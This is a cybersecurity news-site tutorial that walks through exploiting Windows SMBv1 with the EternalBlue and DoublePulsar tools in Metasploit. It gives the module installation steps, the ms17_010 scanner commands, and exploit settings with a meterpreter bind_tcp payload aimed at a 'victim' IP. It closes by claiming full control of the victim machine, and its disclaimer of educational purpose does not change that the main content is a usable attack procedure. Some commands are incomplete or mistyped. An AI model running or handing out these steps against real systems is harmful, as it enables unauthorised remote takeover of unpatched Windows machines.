Friday, May 24, 2024

Exploit Windows Remote PC with EternalBlue & DoublePulsar Exploit through Metasploit

EternalBlue Malware was Developed by National Security Agency (NSA) exploiting Windows-based Server Message Block (SMBv1) it is believed the tool has released by Shadow Brokers Hackers Group in April 2017 and it has been used for Wannacry Cyber Attacks.

SMB version 1 (SMBv1) in various versions of Microsoft Windows accepts specially crafted packets from remote attackers, which is the reason this vulnerability existed with windows os which leads to performing Remote Code Execution which was particularly targeted in Windows 7 and XP.

The NSA Tool Called DOUBLEPULSAR which is designed to provide covert, backdoor access to a Windows system, has been immediately received by Attackers.

Also Read Still More than 50,000 hosts are vulnerable to ETERNAL BLUE Exploit

Once installed, DOUBLEPULSAR  waits for certain types of data to be sent over port 445. When DOUBLEPULSAR  arrives, the implant provides a distinctive response.

EternalBlue Live Demonstration using Metasploit

We need to download and add the Scanner and exploit to Metasploit. Open your Terminal windows and Type the following commands.


git clone


Move file smb_ms17_010.rb under the folder use/share/metasploit-framework/modules/auxiliary/scanner/smb


And then you should copy Eternal Blue-Doublepulsar.rb and debs to under use/share/metasploit-framework/modules/exploits/windows/smb


Now Open the Eternal Blue-Doublepulsar.rb with any Editor and change the path directory for ETERNALBLUE and DOUBLEPULSAR to smb exploit directory use/share/metasploit-framework/modules/exploits/windows/smb.

Also Read  NSA Malware “EternalBlue” Successfully Exploit and Port into Microsoft Windows 10

Then we should specify the name of the process to be injected, we have specified here as explorer.exe


Then you should launch msfconsole and use the auxiliary scan module  smb_ms17_010.rb.

> use auxiliary/scanner/smb/smb_ms17_010
> show options


Now you should set up RHOSTS IP which is the Victims Ip address.

> run


It will go and check whether the host is vulnerable or not and also display the victim’s machine details.

Now we can move to the exploit EternalBlue & Double Pulsar                                             > use exploit/windows/smb/eternalblue_doublepulsar
> set payload windows.x64/meterpreter/bind_tcp

> show options


Then set a target architecture and then RHOST Victim IP address.

> set targetarchitecture x64
> show options


And then type exploit and hit enter.


It’s done now we have got the meterpreter session and the vulnerability has been exploited.


Now the system has been exploited successfully and we have full control over the victim machine now.

You can follow us on LinkedinTwitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity courses online to keep yourself self-updated.


This article is only for an Educational purpose. Any actions and or activities related to the material contained within this Website is solely your responsibility.The misuse of the information in this website can result in criminal charges brought against the persons in question. The authors and  will not be held responsible in the event any criminal charges be brought against any individuals misusing the information in this website to break the law.


Latest articles

Hackers Weaponizing Microsoft Access Documents To Execute Malicious Program

In multiple aggressive phishing attempts, the financially motivated organization UAC-0006 heavily targeted Ukraine, utilizing...

Microsoft Warns Of Storm-0539’s Aggressive Gift Card Theft

Gift cards are attractive to hackers since they provide quick monetization for stolen data...

Kinsing Malware Attacking Apache Tomcat Server With Vulnerabilities

The scalability and flexibility of cloud platforms recently boosted the emerging trend of cryptomining...

NSA Releases Guidance On Zero Trust Maturity To Secure Application From Attackers

Zero Trust Maturity measures the extent to which an organization has adopted and implemented...

Chinese Hackers Stay Hidden On Military And Government Networks For Six Years

Hackers target military and government networks for varied reasons, primarily related to spying, which...

DNSBomb : A New DoS Attack That Exploits DNS Queries

A new practical and powerful Denial of service attack has been discovered that exploits...

Malicious PyPI & NPM Packages Attacking MacOS Users

Cybersecurity researchers have identified a series of malicious software packages targeting MacOS users.These...
Guru baran
Guru baran
Gurubaran is a co-founder of Cyber Security News and GBHackers On Security. He has 10+ years of experience as a Security Consultant, Editor, and Analyst in cybersecurity, technology, and communications.

Free Webinar

Live API Attack Simulation

94% of organizations experience security problems in production APIs, and one in five suffers a data breach. As a result, cyber-attacks on APIs increased from 35% in 2022 to 46% in 2023, and this trend continues to rise.
Key takeaways include:

  • An exploit of OWASP API Top 10 vulnerability
  • A brute force ATO (Account Takeover) attack on API
  • A DDoS attack on an API
  • Positive security model automation to prevent API attacks

Related Articles